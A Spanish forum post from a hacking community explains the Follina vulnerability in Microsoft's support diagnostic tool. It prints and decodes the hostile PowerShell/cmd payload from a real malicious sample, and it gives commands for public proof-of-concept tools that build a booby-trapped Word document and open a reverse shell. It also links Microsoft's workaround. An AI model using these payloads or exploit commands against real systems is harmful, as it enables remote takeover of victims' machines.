Inicio
Buscar
Ingresar
Registrarse
Meta Quest 3: todo lo que necesitas saber sobre las nuevas gafas de realidad virtual de Meta
Hack x Crack - Comunidad de Seguridad informática
»
Seguridad Informatica
»
Hacking
»
Zero-Day Follina - Vulnerabilidad Microsoft Support Diagnostic [CVE-2022-30190]
Imprimir
Páginas: [
1
]
Ir Abajo
Autor
Tema: Zero-Day Follina - Vulnerabilidad Microsoft Support Diagnostic [CVE-2022-30190] (Leído 2892 veces)
R3LI4NT
{ L4 } Geek
Mensajes: 383
El poder del usuario radica en su ANONIMATO.
Zero-Day Follina - Vulnerabilidad Microsoft Support Diagnostic [CVE-2022-30190]
«
en:
Junio 11, 2022, 09:12:39 pm »
A fines de mayor de 2022 unos investigadores habían descubierto una vulnerabilidad de zero-day que afecta a los usuarios de Microsoft Windows y que permite a un atacante apropiarse remotamente de la máquina víctima a través de comandos maliciosos con solamente abrir un documento de Microsoft Office. Lo más alarmante es que fue descubierta mucho antes, supuestamente en abril y misma fue reportada a Microsoft, pero este se hizo la "vista gorda" y no le dio importancia. El investigador
Nao_Sec
reveló en su cuenta de twitter que le había llegado un documento malicioso con un enlace externo asociado al doc para cagar el HTML y ejecutar el código PowerShell.
Nao_Sec se encontraba probando malwares en virustotal hasta que se encontro con el siguiente fragmento de código:
-
https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection
Algo muy importante de esta vulnerabilidad es que no es necesario habilitar los MACROS para que el malware sea ejecutado.
ms-msdt es una herramienta de soporte que recopila información para posteriormente ser enviada y analizada por los técnicos de Microsoft. Esta herramienta permite descargar la información de una URL ofuscada en base64 y si nos ponemos a observar detalladamente la imagen, vemos que intenta descargar
mpsigstub.exe
que también es desarrollado por Microsoft para extraer los archivos de actualización en un directorio temporal.
El investigador subió la muestra a ANY-RUN, es decir, es un sandbox en línea para analizar la muestra de la ejecución del malware en tiempo real.
-
https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/
URL ofuscada a base64:
Código: Text
'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='
Código decode base64 Python3:
Código: Python
import
base64
base64_message
=
'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='
base64_bytes
=
base64_message.
encode
(
'ascii'
)
message_bytes
=
base64
.
b64decode
(
base64_bytes
)
message
=
message_bytes.
decode
(
'ascii'
)
print
(
message
)
Con bash también es posible decodificarlo:
Código: Text
echo 'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw==' | base64 --decode
DECODE:
Código: Text
$cmd = "c:\windows\system32\cmd.exe";Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";
Nos damos una idea de que utiliza el CMD (Comando de la terminal) para ejecutar un comando e iniciar un proceso "oculto", luego mata el proceso msdt.exe (taskkill), seguidamente ejecuta otro proceso y descarga un archivo .RAR (05-2022-0438.rar) para guardarlo dentro de una variable que contenga un string específico por medio del
certutil
ya que este es una de la técnicas más conocidas para ejecutar malware porque permite instalar, realizar copias de seguridad y administrar certificados de Windows. Finalmente expande el archivo y tratará de ejecutar rgb.exe.
Microsoft entrego una guía para poder deshabilitar el protocolo de URL para que ms-msdt no pueda descargar archivos desde el exterior. Es IMPORTANTE aclarar que no se trata de un parche, sino que de un Workarounds (soluciones alternativas), la vulnerabilidad zero-day aún no tiene un parche oficial y sigue siendo explotada.
-
https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
En github ya se han publicado varios códigos para replicar la vulnerabilidad "Follina" de forma local, como por ejemplo:
-
https://github.com/chvancooten/follina.py
-
https://github.com/JohnHammond/msdt-follina
Para poder hacer uso de él debemos clonarlo y luego especificar párametros. Para ejecutar un binario local:
Código: Text
python .\follina.py -t docx -m binary -b \windows\system32\calc.exe
Se genera un archivo "clickme.docx" que dentro contiene un payload que sera iniciado en el servidor web (
http://localhost:80/exploit.html
).
Obtener una reverse shell:
Código: Text
git clone https://github.com/JohnHammond/msdt-follina
cd msdt-follina
python3 follina.py
python3 follina.py --reverse 443 --interface wlan0 --output doc_malicioso.doc
Luego se inicia un servidor local para ser descargado y ejecutado en la máquina Windows:
Código: Text
python3 -m http.server 8080
o
sudo service apache2 start
#R3LI4NT
«
Última modificación: Junio 12, 2022, 05:45:17 pm por R3LI4NT
»
En línea
No contesto dudas por MP, si las tienes, las planteas en el foro.
Road To Hacking v3:
https://github.com/R3LI4NT/road-to-hacking
poseidon
Moderador
{ L4 } Geek
Mensajes: 356
Malware undetector!
Re:Zero-Day Follina - Vulnerbilidad Microsoft Support Diagnostic [CVE-2022-30190]
«
Respuesta #1 en:
Junio 12, 2022, 09:47:25 am »
Un aplauso para Microsoft. XD
En línea
Imprimir
Páginas: [
1
]
Ir Arriba
Hack x Crack - Comunidad de Seguridad informática
»
Seguridad Informatica
»
Hacking
»
Zero-Day Follina - Vulnerabilidad Microsoft Support Diagnostic [CVE-2022-30190]
Va un mudo y le dice a un sordo: Hack x Crack usa cookies. Pues eso...
OK
Learn more